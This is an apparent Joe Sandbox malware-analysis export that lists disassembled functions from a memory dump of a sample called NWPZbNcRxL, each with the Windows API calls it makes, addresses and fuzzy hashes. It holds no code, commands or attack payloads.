Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
Instruction ID: 325e0c32185fd3cf62bd8b7c688d95cec32b3b5e9e564ff6dd13f8e4cbe3fccd
Opcode Fuzzy Hash: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
Instruction Fuzzy Hash: F11165719102088FCF00DF54D8519FEB7B4FF65304F148469D81597691EB325D0AEB54

Function 00C8EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C8EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C8EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C8ED6A
CloseHandle.KERNEL32(?), ref: 00C8EDEB

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
Instruction ID: a1c40ffcc427b847dc3a32dd9845fcb5373988e337a79a15cc9ac30f828f964c
Opcode Fuzzy Hash: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
Instruction Fuzzy Hash: B2819D716043009FE720EF28C896F6AB7E5EF49710F04881DF999DB2D2DAB0AD45DB85

Function 00C90037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C900FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C90183
RegCloseKey.ADVAPI32(?,?), ref: 00C901AF
RegCloseKey.ADVAPI32(00000000), ref: 00C901BC

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
Instruction ID: 8d9112ff371cb0e6d994e0816511e88f9033322b8ae70bdbc6f36c41da57b4e6
Opcode Fuzzy Hash: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
Instruction Fuzzy Hash: 3C514C31208204AFDB14EF54C885FAEB7E9FF84314F50491DF555872A2DB31EA45EB52

Function 00C8D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8D927
GetProcAddress.KERNEL32(00000000,?), ref: 00C8D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00C8D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00C8DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8DA21

Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
Instruction ID: 3d03bd2e70ec8f26604e02ebc1bd2587399b64cf3e8f0f74a481de30e0b33596
Opcode Fuzzy Hash: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
Instruction Fuzzy Hash: 51513935A04205DFCB04EFA8C4849EDB7B4FF49314B148069E856AB352DB31EE85EF91

Function 00C7E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C7E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C7E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C7E687

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C7E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C7E6B4

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 06571865dd5a212681b8254b38b22840ddf67ffacbe097fe724339c8819c4954
Instruction ID: 4c091bc5549c90bf297f7b8192df18f869baa94a33808e4cb04544a150d19a0d
Opcode Fuzzy Hash: 06571865dd5a212681b8254b38b22840ddf67ffacbe097fe724339c8819c4954
Instruction Fuzzy Hash: 25510D35A00109DFDB01EF64C995AADBBF5EF09314F1480A9E859AB3A1CB31EE51EF50

Function 00C9A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
Instruction ID: 50aaca754c58241f503f3c4f02b5b9fa0941a0e7161018cb34afb19a45a13cc7
Opcode Fuzzy Hash: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
Instruction Fuzzy Hash: 22418035905214EFDB24DB68CC4DFADBBA4EB09310F150166F926A72E1C730AE51EA91

Function 00C663AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C663E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00C66433
TranslateMessage.USER32(?), ref: 00C6645C
DispatchMessageW.USER32(?), ref: 00C66466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C66475

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
Instruction ID: 41f15b90e7fb93b72399366f221b2650febac687c063a8ac6b911c0cc7142374
Opcode Fuzzy Hash: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
Instruction Fuzzy Hash: 1B31A171941646AFDB34CFB1DC88BBABBE8AB01304F14017AE435C31A1EB359989DB60

Function 00C68A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C68A30
PostMessageW.USER32(?,00000201,00000001), ref: 00C68ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C68AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00C68AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C68AF8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
Instruction ID: 3376c8a3ca939b1530519511bbdf126e4562af1f96b84a4029297ccc54386183
Opcode Fuzzy Hash: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
Instruction Fuzzy Hash: 4531C071500219EFDF24CFA8DD8CB9E3BB5EB04315F10822AF925E61D1C7B09A58EB90

Function 00C6B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C6B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C6B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C6B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C6B27F
_wcsstr.LIBCMT ref: 00C6B289

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: c283f11cb02b32500bacd286dc01f29d5b4a40cef005d87bec96d73abe6d8aee
Instruction ID: 306ad8b03f01aaf23ce46b6e4e8c42a8c82e8ee468c7d566ef2078ce8f714fe5
Opcode Fuzzy Hash: c283f11cb02b32500bacd286dc01f29d5b4a40cef005d87bec96d73abe6d8aee
Instruction Fuzzy Hash: 5721F5322042047BEB255B759C99F7F7BECDF49710F10413EF805DA161EB61DD81A260

Function 00C9B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

GetWindowLongW.USER32(?,000000F0), ref: 00C9B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C9B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C9B1CF
GetSystemMetrics.USER32(00000004), ref: 00C9B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C80E90,00000000), ref: 00C9B216

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 356123fd1252703752de67ea9f8c9cadab9efef80da18b3cbc21206550738d71
Instruction ID: 70a6c01478a465bad18f23899c35bd60c69d953ca5dc4532cb0527e7cf50cbe6
Opcode Fuzzy Hash: 356123fd1252703752de67ea9f8c9cadab9efef80da18b3cbc21206550738d71
Instruction Fuzzy Hash: 1E217C71A10655AFCF109F39AD4CB6E3BA4EB05721B11462AF932D71E0E7309E219B90

Function 00C69307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C69320

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69352
__itow.LIBCMT ref: 00C6936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69392
__itow.LIBCMT ref: 00C693A3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 3293a2964519d5eb2f3724237e607f26e93fc893fd5004116a4e7193d769f613
Instruction ID: 8ad0b47535fa49521f0b61547e2ad570b13c8f64c82118c48357fb53bb5bab05
Opcode Fuzzy Hash: 3293a2964519d5eb2f3724237e607f26e93fc893fd5004116a4e7193d769f613
Instruction Fuzzy Hash: 6121C531704208BBDB20AB658CC9EEE7BBDEB49710F044039F905DB2E1D6B08E56A791

Function 00C85A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C85A6E
GetForegroundWindow.USER32 ref: 00C85A85
GetDC.USER32(00000000), ref: 00C85AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00C85ACD
ReleaseDC.USER32(00000000,00000003), ref: 00C85B08

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 4c2114aed02caed2f9d5676b1035392a2d3ebd73134bf041623dd2e6dd9ad381
Instruction ID: 8769df7d1f6af3cc4d316e7a5416504a0a020480da6ea21affae476676d09eab
Opcode Fuzzy Hash: 4c2114aed02caed2f9d5676b1035392a2d3ebd73134bf041623dd2e6dd9ad381
Instruction Fuzzy Hash: 45216235A00204AFD714EF65D888BAEB7E5EF49350F14C479F949D7351CA70AD41EB90

Function 00C112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C1134D
SelectObject.GDI32(?,00000000), ref: 00C1135C
BeginPath.GDI32(?), ref: 00C11373
SelectObject.GDI32(?,00000000), ref: 00C1139C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d095c0650c0b882789c7c4c4006d80ac58c0cca81b3afadeec574724aec19e60
Instruction ID: 19bbf47f5596d48529563adf164d3af038f08d5d7c973c54f62916736fd97a66
Opcode Fuzzy Hash: d095c0650c0b882789c7c4c4006d80ac58c0cca81b3afadeec574724aec19e60
Instruction Fuzzy Hash: C2215C70841608EFDB109F25EC087AD7BE8FB01322F58422BF920961F4D37499A1EF90

Function 00C74A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C74ABA
__beginthreadex.LIBCMT ref: 00C74AD8
MessageBoxW.USER32(?,?,?,?), ref: 00C74AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C74B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C74B0A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 46e168895e1f617544725088c1317ce2b92f5819ac27d760bd1abafc2a48aa70
Instruction ID: e608805df7655b57b16cd8f470699d5ddb12c96fbb02705e147f44994fbda671
Opcode Fuzzy Hash: 46e168895e1f617544725088c1317ce2b92f5819ac27d760bd1abafc2a48aa70
Instruction Fuzzy Hash: EA110876D05619BBC7058FB89C08BAF7FACEB45320F14826AF828D3260D771CD0487A0

Function 00C68202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C6821E
GetLastError.KERNEL32(?,00C67CE2,?,?,?), ref: 00C68228
GetProcessHeap.KERNEL32(00000008,?,?,00C67CE2,?,?,?), ref: 00C68237
HeapAlloc.KERNEL32(00000000,?,00C67CE2,?,?,?), ref: 00C6823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C68255

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 8498e78f9f32adec0ed47ea1ec31ef105ec70f8fb00c58025578416de64fa54d
Instruction ID: 800b0a355eacd8c0f441df2909cba28dcda03313fc58f0478d68c6ace4c96bcd
Opcode Fuzzy Hash: 8498e78f9f32adec0ed47ea1ec31ef105ec70f8fb00c58025578416de64fa54d
Instruction Fuzzy Hash: BE016DB1204204BFDB204FA5DC8CE6F7BACEF8A755B50052EF859C2260DA318D45CA60

Function 00C6710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C6716C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 2c07e8a28f99e4185450ea9df65b890afd6fad49cab60c9088524003a91be8c8
